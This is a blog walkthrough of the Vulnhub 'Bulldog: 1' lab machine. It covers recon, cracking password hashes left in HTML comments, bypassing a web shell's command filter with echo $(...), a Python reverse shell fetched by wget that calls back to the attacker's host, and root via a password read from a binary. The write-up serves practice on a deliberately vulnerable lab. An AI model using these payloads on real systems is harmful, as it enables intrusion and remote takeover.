Vulnhub.com - Bulldog: 1

September 02, 2018

Welcome back to another challenge, which is Bulldog machine from Vulnhub.

Bulldog Industries recently had its website defaced and owned by the malicious German Shepherd Hack Team. Could this mean there are more vulnerabilities to exploit? Why don't you find out? :)

This is a standard Boot-to-Root. Your only goal is to get into the root directory and see the congratulatory message, how you do it is up to you!

Difficulty: Beginner/Intermediate, if you get stuck, try to figure out all the different ways you can interact with the system. That's my only hint ;)

Made by Nick Frichette (frichetten.com) Twitter: @frichette_n

I'd highly recommend running this on Virtualbox, I had some issues getting it to work in VMware. Additionally DHCP is enabled so you shouldn't have any troubles getting it onto your network. It defaults to bridged mode, but feel free to change that if you like.

Solution

Start the scan with nmap.

[email protected]:~# nmap -sC -sV -sS -A -v 10.0.0.19
Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-30 03:34 EDT
NSE: Loaded 148 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 03:34
Completed NSE at 03:34, 0.00s elapsed
Initiating NSE at 03:34
Completed NSE at 03:34, 0.00s elapsed
Initiating ARP Ping Scan at 03:34
Scanning 10.0.0.19 [1 port]
Completed ARP Ping Scan at 03:34, 0.04s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 03:34
Completed Parallel DNS resolution of 1 host. at 03:34, 0.00s elapsed
Initiating SYN Stealth Scan at 03:34
Scanning 10.0.0.19 [1000 ports]
Discovered open port 23/tcp on 10.0.0.19
Discovered open port 8080/tcp on 10.0.0.19
Discovered open port 80/tcp on 10.0.0.19
Completed SYN Stealth Scan at 03:34, 1.15s elapsed (1000 total ports)
Initiating Service scan at 03:34
Scanning 3 services on 10.0.0.19
Completed Service scan at 03:34, 6.09s elapsed (3 services on 1 host)
Initiating OS detection (try #1) against 10.0.0.19
NSE: Script scanning 10.0.0.19.
Initiating NSE at 03:34
Completed NSE at 03:34, 7.12s elapsed
Initiating NSE at 03:34
Completed NSE at 03:34, 0.00s elapsed
Nmap scan report for 10.0.0.19
Host is up (0.00043s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE VERSION
23/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 20:8b:fc:9e:d9:2e:28:22:6b:2e:0e:e3:72:c5:bb:52 (RSA)
|   256 cd:bd:45:d8:5c:e4:8c:b6:91:e5:39:a9:66:cb:d7:98 (ECDSA)
|_  256 2f:ba:d5:e5:9f:a2:43:e5:3b:24:2c:10:c2:0a:da:66 (ED25519)
80/tcp   open  http    WSGIServer 0.1 (Python 2.7.12)
| http-methods: 
|_  Supported Methods: GET HEAD OPTIONS
|_http-server-header: WSGIServer/0.1 Python/2.7.12
|_http-title: Bulldog Industries
8080/tcp open  http    WSGIServer 0.1 (Python 2.7.12)
| http-methods: 
|_  Supported Methods: GET HEAD OPTIONS
|_http-server-header: WSGIServer/0.1 Python/2.7.12
|_http-title: Bulldog Industries
MAC Address: 08:00:27:16:1D:5F (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Uptime guess: 198.048 days (since Tue Feb 13 01:26:08 2018)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.43 ms 10.0.0.19

NSE: Script Post-scanning.
Initiating NSE at 03:34
Completed NSE at 03:34, 0.00s elapsed
Initiating NSE at 03:34
Completed NSE at 03:34, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 17.05 seconds
           Raw packets sent: 1024 (45.850KB) | Rcvd: 1016 (41.334KB)

As we can see, there are three open ports, two http running on ports 80 and 8080 and ssh running on port 23.

Let’s start by enumerating the web service on port 80.

[email protected]:~# curl 10.0.0.19

<!DOCTYPE html>
<html lang="en">
<head>
  <title>Bulldog Industries</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="/static/css/bootstrap.css">
  <script src="/static/js/jquery.min.js"></script>
  <script src="/static/js/bootstrap.js"></script>
</head>
<body style="background-color:grey"> 
 
<div class="container">
  <h1><a href="/" style="color:white" >Bulldog Industries</a></h1>
  <div class="card panel-default" style="padding:1em">
    <div class="card-block">
        <p><font size="4em">Thank you for visiting Bulldog Industries' website, the world's number 
	one purveyor of high quality English Bulldog photography! Unfortunately we are 
	suspending business operations until further notice. On the first of this month, 
	we were made aware of a breach of our technology systems. We are currently 
	assessing the possibility that hackers may have gotten access to customer 
	payment information. Do not be alarmed as we will be providing simple credit 
	monitoring for all affected customers.<br><br>For more information on this, please 
	see our public disclosure notice found below.</font></p>

	<p><font size="6em"><center><a href="/notice" style="color:blue">Public Notice</a></center></font></p>

	<center><img style="max-width:100%" src="/static/bulldog.jpg"/></center>
    </div>
  </div>
</div>

</body>
</html>


[email protected]:~# curl 10.0.0.19/dev/

<!DOCTYPE html>
<html lang="en">
<head>
  <title>UNDER DEVELOPMENT</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="/static/css/bootstrap.css">
  <script src="/static/js/jquery.min.js"></script>
  <script src="/static/js/bootstrap.js"></script>
</head>
<body style="background-color:#2c74e8"> 
 
<div class="container">
  <h1><center><a href="/" style="color:white" >UNDER DEVELOPMENT</a></center></h1>
  <div class="card panel-default" style="padding:1em">
    <div class="card-block">
        <p><font size="4em">If you're reading this you're likely a contractor working for 
	Bulldog Industries. Congratulations! I'm your new boss, Team Lead: Alan Brooke. The CEO 
	has literally fired the entire dev team and staff. As a result, we need to hire a bunch of people 
	very quickly. I'm going to try and give 
	you a crash course on Bulldog Industries website.<br><br>
	<b>How did the previous website get attacked?</b><br><br>
	An APT exploited a vulnerability in the webserver which gave them a low-privilege shell. 
	From there they exploited dirty cow to get root on the box. After that, the entire system 
	was taken over and they defaced the website. We are still transitioning from the old system to the 
	new one. In the mean time we are using some files which may be corrupted from the original 
	system. We haven't had a chance to make sure there were no lingering traces of the hack so if you find 
	any, send me an email.<br><br>
	<b>How are we preventing future breaches?</b><br><br>
	At the request of Mr. Churchy, we are removing PHP entirely from the new server. Additionally 
	we will not be using PHPMyAdmin or any other popular CMS system. We have been tasked with creating 
	our own.<br><br>
	<b>Design of new system?</b><br><br>
	The new website will be written entirely in Django (Mr. Churchy requested "high-end tech hipster stuff"). 
	As of right now, SSH is enabled on the system. This will be turned off soon as we will transition 
	to using Web-Shell, a proprietary shell interface. This tool is explained at the link below. Additionally, 
	be aware that we will start using MongoDB, however we haven't fully installed that yet.<br><br>
	Also be aware that we will be implementing a revolutionary AV system that is being custom made for us by 
	a vendor. It touts being able to run every minute to detect intrusion and hacking. Once that's up and running 
	we will install it on the system.

	<p><font size="6em"><center><a href="/dev/shell" style="color:blue">Web-Shell</a></center></font></p>

	<b>Who do I talk to to get started?</b><br><br>

	<!--Need these password hashes for testing. Django's default is too complex-->
	<!--We'll remove these in prod. It's not like a hacker can do anything with a hash-->
	Team Lead: [email protected]<br><!--6515229daf8dbdc8b89fed2e60f107433da5f2cb-->
	Back-up Team Lead: [email protected]<br><br><!--38882f3b81f8f2bc47d9f3119155b05f954892fb-->
	Front End: [email protected]<br><!--c6f7e34d5d08ba4a40dd5627508ccb55b425e279-->
	Front End: [email protected]<br><br><!--0e6ae9fe8af1cd4192865ac97ebf6bda414218a9-->
	Back End: [email protected]<br><!--553d917a396414ab99785694afd51df3a8a8a3e0-->
	Back End: [email protected]<br><br><!--ddf45997a7e18a25ad5f5cf222da64814dd060d5-->
	Database: [email protected]<br><!--d8b8dd5e7f000b8dea26ef8428caf38c04466b3e-->
	</font></p>
    </div>
  </div>
</div>

</body>
</html>

Great, at the bottom of the source code we have hashes commented out. Pasting them into the Crackstation gave us this results.

6515229daf8dbdc8b89fed2e60f107433da5f2cb	Unknown	Not found.
38882f3b81f8f2bc47d9f3119155b05f954892fb	Unknown	Not found.
c6f7e34d5d08ba4a40dd5627508ccb55b425e279	Unknown	Not found.
0e6ae9fe8af1cd4192865ac97ebf6bda414218a9	Unknown	Not found.
553d917a396414ab99785694afd51df3a8a8a3e0	Unknown	Not found.
ddf45997a7e18a25ad5f5cf222da64814dd060d5	sha1	bulldog
d8b8dd5e7f000b8dea26ef8428caf38c04466b3e	sha1	bulldoglover

So our cracked credentials are as follow.

nick:bulldog
sarah:bulldoglover

But unluckily, none of these work on ssh. From there, I decided to run a brute force attack against directories with dirb.

[email protected]:~# dirb http://10.0.0.19

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Thu Aug 30 04:50:34 2018
URL_BASE: http://10.0.0.19/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.0.0.19/ ----
==> DIRECTORY: http://10.0.0.19/admin/                                         
==> DIRECTORY: http://10.0.0.19/dev/                                           
+ http://10.0.0.19/robots.txt (CODE:200|SIZE:1071)                             
                                                                               
---- Entering directory: http://10.0.0.19/admin/ ----
==> DIRECTORY: http://10.0.0.19/admin/auth/                                    
==> DIRECTORY: http://10.0.0.19/admin/login/                                   
==> DIRECTORY: http://10.0.0.19/admin/logout/                                  
                                                                               
---- Entering directory: http://10.0.0.19/dev/ ----
==> DIRECTORY: http://10.0.0.19/dev/shell/                                     
                                                                               
---- Entering directory: http://10.0.0.19/admin/auth/ ----
==> DIRECTORY: http://10.0.0.19/admin/auth/group/                              
==> DIRECTORY: http://10.0.0.19/admin/auth/user/                               
                                                                               
---- Entering directory: http://10.0.0.19/admin/login/ ----
                                                                               
---- Entering directory: http://10.0.0.19/admin/logout/ ----
                                                                               
---- Entering directory: http://10.0.0.19/dev/shell/ ----
                                                                               
---- Entering directory: http://10.0.0.19/admin/auth/group/ ----
(!) WARNING: NOT_FOUND[] not stable, unable to determine correct URLs {30X}.
    (Try using FineTunning: '-f')
                                                                               
---- Entering directory: http://10.0.0.19/admin/auth/user/ ----
(!) WARNING: NOT_FOUND[] not stable, unable to determine correct URLs {30X}.
    (Try using FineTunning: '-f')
                                                                               
-----------------
END_TIME: Thu Aug 30 04:53:01 2018
DOWNLOADED: 32284 - FOUND: 1

Directory named admin? Seems interesting, let’s try that.

Admin page

We can authenticate straight away with previously gathered credentials, but there is nothing in the service so I decided to move on and go to the /dev/shell web page. It’s essential that you’re logged into the admin as the shell won’t grant you the access.

Admin page

Before anything, I decided to check other pages found by dirb.

[email protected]:~# curl http://10.0.0.19/robots.txt
  ________                                       _________.__                  .__                     .___
 /  _____/  ___________  _____ _____    ____    /   _____/|  |__   ____ ______ |  |__   ___________  __| _/
/   \  ____/ __ \_  __ \/     \\__  \  /    \   \_____  \ |  |  \_/ __ \\____ \|  |  \_/ __ \_  __ \/ __ | 
\    \_\  \  ___/|  | \/  Y Y  \/ __ \|   |  \  /        \|   Y  \  ___/|  |_> >   Y  \  ___/|  | \/ /_/ | 
 \______  /\___  >__|  |__|_|  (____  /___|  / /_______  /|___|  /\___  >   __/|___|  /\___  >__|  \____ | 
        \/     \/            \/     \/     \/          \/      \/     \/|__|        \/     \/           \/ 
			  ___ ___                __     ___________                    
			 /   |   \_____    ____ |  | __ \__    ___/___ _____    _____  
			/    ~    \__  \ _/ ___\|  |/ /   |    |_/ __ \\__  \  /     \ 
			\    Y    // __ \\  \___|    <    |    |\  ___/ / __ \|  Y Y  \
			 \___|_  /(____  /\___  >__|_ \   |____| \___  >____  /__|_|  /
			       \/      \/     \/     \/              \/     \/      \/ 

						You got owned
[email protected]:~# curl http://10.0.0.19/notice/

<!DOCTYPE html>
<html lang="en">
<head>
  <title>Bulldog Industries</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <link rel="stylesheet" href="/static/css/bootstrap.css">
  <script src="/static/js/jquery.min.js"></script>
  <script src="/static/js/bootstrap.js"></script>
</head>
<body style="background-color:grey"> 
 
<div class="container">
  <h1><a href="/" style="color:white" >Bulldog Industries</a></h1>
  <div class="card panel-default" style="padding:1em">
    <div class="card-block">
        <p><font size="4em">To our valued customers,<br><br>On the first of this month our 
	technical analysts discovered a breach of our payment card systems. I don’t know 
	how these hackers did it. Our technical folk are telling me something about a clam 
	shell and a smelly cow? I'm not sure about all of that.<br><br>
	To prove Bulldog Industries’ commitment to our customers I fired all of our existing 
	technical staff. All of them! We are going to restart from the ground up! No more 
	excuses! Our tech guys will have to make due with what they’ve got. We even 
	increased their budget 1%! <br><br>You gotta see the neck beards on the new guys! 
	Real tech hipsters. Zuckerberg types. They know their stuff, security wont be a 
	problem from now on!<br><br>
	I'd like to remind our valued customers that we will be providing basic credit 
	monitoring services as a result of this breach (if you’ve made a purchase of $100 
	or more).<br><br>
	Your true friend,<br><br>Winston Churchy (CEO)</font></p>
    </div>
  </div>
</div>

</body>
</html>

But not much of a clue there. Let’s poke into the system with shell as much as we can.

Command : ls -la

total 56
drwxrwxr-x 3 django django  4096 Aug 30 09:14 .
drwxr-xr-x 5 django django  4096 Sep 21  2017 ..
drwxrwxr-x 4 django django  4096 Aug 24  2017 bulldog
-rwxr-xrwx 1 django django 40960 Aug 30 09:14 db.sqlite3
-rwxr-xr-x 1 django django   250 Aug 16  2017 manage.py

Command : cat manage.py

#!/usr/bin/env python
import os
import sys

if __name__ == "__main__":
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "bulldog.settings")

    from django.core.management import execute_from_command_line

    execute_from_command_line(sys.argv)

Command : ./manage.py test

INVALID COMMAND. I CAUGHT YOU HACKER!


Command : ls -la bulldog

total 52
drwxrwxr-x 4 django django 4096 Aug 24  2017 .
drwxrwxr-x 3 django django 4096 Aug 30 09:14 ..
-rw-r--r-- 1 django django    0 Aug 16  2017 __init__.py
-rw-r--r-- 1 django django  138 Aug 16  2017 __init__.pyc
-rw-r--r-- 1 django django 2762 Aug 24  2017 settings.py
-rw-r--r-- 1 django django 2971 Aug 24  2017 settings.pyc
drwxrwxr-x 4 django django 4096 Aug 24  2017 static
drwxrwxr-x 2 django django 4096 Sep 21  2017 templates
-rw-r--r-- 1 django django 1154 Aug 18  2017 urls.py
-rw-r--r-- 1 django django 1477 Aug 24  2017 urls.pyc
-rw-rw-r-- 1 django django  995 Aug 19  2017 views.py
-rw-rw-r-- 1 django django 1927 Aug 19  2017 views.pyc
-rw-r--r-- 1 django django  391 Aug 16  2017 wsgi.py
-rw-r--r-- 1 django django  595 Aug 16  2017 wsgi.pyc

In addition, we can reveal the source code of the shell.

Command : cat bulldog/views.py

from django.shortcuts import render
import subprocess

commands = ['ifconfig','ls','echo','pwd','cat','rm']

def homepage(request):
    return render(request, 'index.html')

def notice(request):
    return render(request, 'notice.html')

def dev(request):
    return render(request, 'dev.html')

def shell(request):
    if request.method == "POST":
	command = request.POST.get("command", None)
	to_return = "Command : " + command + "\n\n"

	if validate(command):
	    execute = subprocess.check_output(command, shell=True)
	    to_return += execute
  	elif ";" in command:
	    to_return += "INVALID COMMAND. I CAUGHT YOU HACKER! ';' CAN BE USED TO EXECUTE MULTIPLE COMMANDS!!"
	else:
	    to_return += "INVALID COMMAND. I CAUGHT YOU HACKER!"

	context = {'data': to_return}
	return render(request, 'shell.html', context)
    return render(request, 'shell.html')

def validate(command):
    if any(com in command for com in commands) and ";" not in command:
        return True
    return False

Back to the shell. After many tries, I found out that you can execute commands with echo using echo $(COMMAND) syntax.

Command : echo $(which nc)

/bin/nc

Unfortunately, simple reverse shell with netcat does not work.

My next step was python reverse shell, but we cannot enter ; characters into the command, application will detect it and stop us. Simple way to bypass that is to paste the reverse shell into the file on our host machine, set up a SimpleHTTPServer and use wget to get the file.

[email protected]:~# cat reverse.py 
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.4",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Now we can wget the file using the shell.

Command : echo $(wget 10.0.0.4:8000/reverse.py)

Command : ls 

bulldog
db.sqlite3
manage.py
reverse.py

By running it, we get that sweet unrestricted shell.

echo $(python reverse.py)

[email protected]:~# nc -lvp 1337
listening on [any] 1337 ...
10.0.0.19: inverse host lookup failed: Unknown host
connect to [10.0.0.4] from (UNKNOWN) [10.0.0.19] 44172
/bin/sh: 0: can't access tty; job control turned off
$ whoami
django

Now let’s find something that will allow us to escalate privilages into the root.

[email protected]:/home/django/bulldog$ cd /home
cd /home
[email protected]:/home$ ls -la
ls -la
total 16
drwxr-xr-x  4 root         root         4096 Aug 24  2017 .
drwxr-xr-x 24 root         root         4096 Aug 26  2017 ..
drwxr-xr-x  5 bulldogadmin bulldogadmin 4096 Sep 21  2017 bulldogadmin
drwxr-xr-x  5 django       django       4096 Sep 21  2017 django
[email protected]:/home$ cd bulldogadmin
cd bulldogadmin
[email protected]:/home/bulldogadmin$ ls -la
ls -la
total 40
drwxr-xr-x 5 bulldogadmin bulldogadmin 4096 Sep 21  2017 .
drwxr-xr-x 4 root         root         4096 Aug 24  2017 ..
-rw-r--r-- 1 bulldogadmin bulldogadmin  220 Aug 24  2017 .bash_logout
-rw-r--r-- 1 bulldogadmin bulldogadmin 3771 Aug 24  2017 .bashrc
drwx------ 2 bulldogadmin bulldogadmin 4096 Aug 24  2017 .cache
drwxrwxr-x 2 bulldogadmin bulldogadmin 4096 Sep 21  2017 .hiddenadmindirectory
drwxrwxr-x 2 bulldogadmin bulldogadmin 4096 Aug 25  2017 .nano
-rw-r--r-- 1 bulldogadmin bulldogadmin  655 Aug 24  2017 .profile
-rw-rw-r-- 1 bulldogadmin bulldogadmin   66 Aug 25  2017 .selected_editor
-rw-r--r-- 1 bulldogadmin bulldogadmin    0 Aug 24  2017 .sudo_as_admin_successful
-rw-rw-r-- 1 bulldogadmin bulldogadmin  217 Aug 24  2017 .wget-hsts
[email protected]:/home/bulldogadmin$ cd .hiddenadmindirectory
cd .hiddenadmindirectory
[email protected]:/home/bulldogadmin/.hiddenadmindirectory$ ls -la
ls -la
total 24
drwxrwxr-x 2 bulldogadmin bulldogadmin 4096 Sep 21  2017 .
drwxr-xr-x 5 bulldogadmin bulldogadmin 4096 Sep 21  2017 ..
-rw-r--r-- 1 bulldogadmin bulldogadmin 8728 Aug 26  2017 customPermissionApp
-rw-rw-r-- 1 bulldogadmin bulldogadmin  619 Sep 21  2017 note
[email protected]:/home/bulldogadmin/.hiddenadmindirectory$ cat note
cat note
Nick,

I'm working on the backend permission stuff. Listen, it's super prototype but I think it's going to work out great. Literally run the app, give your account password, and it will determine if you should have access to that file or not! 

It's great stuff! Once I'm finished with it, a hacker wouldn't even be able to reverse it! Keep in mind that it's still a prototype right now. I am about to get it working with the Django user account. I'm not sure how I'll implement it for the others. Maybe the webserver is the only one who needs to have root access sometimes?

Let me know what you think of it!

-Ashley

So it seems we have a binary to reverse engineer. Firstly, I’ll start SimpleHTTPServer to copy it into my Kali machine.

Then we can use radare to try and crack it.

<gadmin/.hiddenadmindirectory$ python -m SimpleHTTPServer                    
Serving HTTP on 0.0.0.0 port 8000 ...
10.0.0.4 - - [30/Aug/2018 15:21:51] "GET /customPermissionApp HTTP/1.1" 200 -
[email protected]:~/vulnhub/bulldog# wget 10.0.0.19:8000/customPermissionApp
--2018-08-30 11:21:51--  http://10.0.0.19:8000/customPermissionApp
Connecting to 10.0.0.19:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 8728 (8.5K) [application/octet-stream]
Saving to: ‘customPermissionApp’

customPermissionApp 100%[===================>]   8.52K  --.-KB/s    in 0s      

2018-08-30 11:21:51 (43.8 MB/s) - ‘customPermissionApp’ saved [8728/8728]

[email protected]:~/vulnhub/bulldog# r2 customPermissionApp 
[0x004004e0]> aaa
[x] Analyze all flags starting with sym. and entry0 (aa)
[x] Analyze function calls (aac)
[x] Analyze len bytes of instructions for references (aar)
[x] Use -AA or aaaa to perform additional experimental analysis.
[x] Constructing a function name for fcn.* and sym.func.* functions (aan)
[0x004005d6]> izz
000 0x00000034 0x00400034   4  10 (LOAD0) utf16le @8\[email protected]
001 0x00000238 0x00400238  27  28 (.interp) ascii /lib64/ld-linux-x86-64.so.2
002 0x00000286 0x00400286   6   7 (.note.gnu.build_id) ascii 32S0-t
003 0x00000349 0x00400349   9  10 (.dynstr) ascii libc.so.6
004 0x00000353 0x00400353   4   5 (.dynstr) ascii puts
005 0x00000358 0x00400358  16  17 (.dynstr) ascii __stack_chk_fail
006 0x00000369 0x00400369   6   7 (.dynstr) ascii system
007 0x00000370 0x00400370  17  18 (.dynstr) ascii __libc_start_main
008 0x00000382 0x00400382  14  15 (.dynstr) ascii __gmon_start__
009 0x00000391 0x00400391   9  10 (.dynstr) ascii GLIBC_2.4
010 0x0000039b 0x0040039b  11  12 (.dynstr) ascii GLIBC_2.2.5
011 0x000004a1 0x004004a1   4   5 (.plt) ascii %z\v 
012 0x000004b1 0x004004b1   4   5 (.plt) ascii %r\v 
013 0x000004c1 0x004004c1   4   5 (.plt) ascii %j\v 
014 0x000004d1 0x004004d1   4   5 (.plt.got) ascii %"\v 
015 0x00000515 0x00400515   4   5 (.text) ascii UH-H
016 0x000005eb 0x004005eb   5   7 (.text)  utf8 1?\b\[email protected]
-->017 0x0000060d 0x0040060d   9  10 (.text) ascii SUPERultH
018 0x0000061b 0x0040061b   9  10 (.text) ascii imatePASH
019 0x00000629 0x00400629   9  10 (.text) ascii SWORDyouH
020 0x00000637 0x00400637   7   8 (.text) ascii CANTget
021 0x00000669 0x00400669   6   7 (.text) ascii dH34%(
022 0x00000680 0x00400680   5   6 (.text) ascii AWAVA
023 0x00000687 0x00400687   5   6 (.text) ascii AUATL
024 0x0000068d 0x0040068d   4   5 (.text) ascii %~\a 
025 0x00000695 0x00400695   4   5 (.text) ascii -~\a 
026 0x000006d9 0x004006d9  14  16 (.text)  utf8 \b[]A\A]A^A_Ðf. blocks=Basic Latin,Latin-1 Supplement
027 0x00000708 0x00400708  52  53 (.rodata) ascii Please enter a valid username to use root privileges
028 0x00000740 0x00400740  40  41 (.rodata) ascii \tUsage: ./customPermissionApp <username>
-->029 0x00000769 0x00400769  12  13 (.rodata) ascii sudo su root
030 0x000007c0 0x004007c0   4   5 (.eh_frame) ascii \e\f\a\b
031 0x000007f0 0x004007f0   4   5 (.eh_frame) ascii \e\f\a\b
032 0x00000817 0x00400817   5   6 (.eh_frame) ascii ;*3$"
033 0x00001048 0x00000000  51  52 (.comment) ascii GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.4) 5.4.0 20160609

Hey, we don’t even have to reverse engineer that! Looking for strings we can see sudo su root, and the string that seems to be a password to the root account.

Is it SUPERultiHmatePASHSWORDyouHCANTget? Nope, but after few different tries, getting rid of this ood H letters got me lucky.

[email protected]:/home/bulldogadmin/.hiddenadmindirectory$ sudo su root
sudo su root
[sudo] password for django: SUPERultHimatePASHSWORDyouHCANTget

Sorry, try again.
[sudo] password for django: 

Sorry, try again.
[sudo] password for django: SUPERultimatePASSWORDyouCANTget

Now we can get the flag.

[email protected]:/home/bulldogadmin/.hiddenadmindirectory# cd /root
cd /root
[email protected]:~# ls -la
ls -la
total 36
drwx------  3 root root 4096 Sep 21  2017 .
drwxr-xr-x 24 root root 4096 Aug 26  2017 ..
-rw-------  1 root root  378 Sep 21  2017 .bash_history
-rw-r--r--  1 root root 3106 Oct 22  2015 .bashrc
-rw-r--r--  1 root root  288 Sep 21  2017 congrats.txt
drwxr-xr-x  2 root root 4096 Aug 24  2017 .nano
-rw-r--r--  1 root root  148 Aug 17  2015 .profile
-rw-r--r--  1 root root   66 Aug 24  2017 .selected_editor
-rw-------  1 root root 1065 Sep 21  2017 .viminfo
[email protected]:~# cat congrats.txt
cat congrats.txt
Congratulations on completing this VM :D That wasn't so bad was it?

Let me know what you thought on twitter, I'm @frichette_n

As far as I know there are two ways to get root. Can you find the other one?

Perhaps the sequel will be more challenging. Until next time, I hope you enjoyed!

Contact

If you have any suggestions regarding this post or just want to chat together check out these ways to reach out to me.